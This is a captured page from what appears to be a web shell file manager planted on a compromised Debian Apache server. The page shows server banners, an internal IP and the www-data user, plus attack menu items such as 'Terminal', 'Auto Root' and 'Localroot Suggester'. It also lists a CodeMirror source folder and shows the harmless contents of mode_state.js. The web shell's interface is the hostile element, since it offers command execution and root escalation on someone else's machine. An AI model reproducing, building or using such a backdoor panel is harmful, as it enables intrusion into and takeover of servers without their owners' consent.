Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
codemirror /
src /
display /
Delete
Unzip
Name
Size
Permission
Date
Action
Display.js
4.75
KB
-rw-r--r--
2022-10-24 16:35
focus.js
1.55
KB
-rw-r--r--
2022-10-24 16:35
gutters.js
1.52
KB
-rw-r--r--
2022-10-24 16:35
highlight_worker.js
2.22
KB
-rw-r--r--
2022-10-24 16:35
line_numbers.js
2.12
KB
-rw-r--r--
2022-10-24 16:35
mode_state.js
621
B
-rw-r--r--
2022-10-24 16:35
operations.js
7.89
KB
-rw-r--r--
2022-10-24 16:35
scroll_events.js
4.85
KB
-rw-r--r--
2022-10-24 16:35
scrollbars.js
7.31
KB
-rw-r--r--
2022-10-24 16:35
scrolling.js
7.98
KB
-rw-r--r--
2022-10-24 16:35
selection.js
7.29
KB
-rw-r--r--
2022-10-24 16:35
update_display.js
10.26
KB
-rw-r--r--
2022-10-24 16:35
update_line.js
7.8
KB
-rw-r--r--
2022-10-24 16:35
update_lines.js
3.39
KB
-rw-r--r--
2022-10-24 16:35
view_tracking.js
5.26
KB
-rw-r--r--
2022-10-24 16:35
Save
Rename
import { getMode } from "../modes.js" import { startWorker } from "./highlight_worker.js" import { regChange } from "./view_tracking.js" // Used to get the editor into a consistent state again when options change. export function loadMode(cm) { cm.doc.mode = getMode(cm.options, cm.doc.modeOption) resetModeState(cm) } export function resetModeState(cm) { cm.doc.iter(line => { if (line.stateAfter) line.stateAfter = null if (line.styles) line.styles = null }) cm.doc.modeFrontier = cm.doc.highlightFrontier = cm.doc.first startWorker(cm, 100) cm.state.modeGen++ if (cm.curOp) regChange(cm) }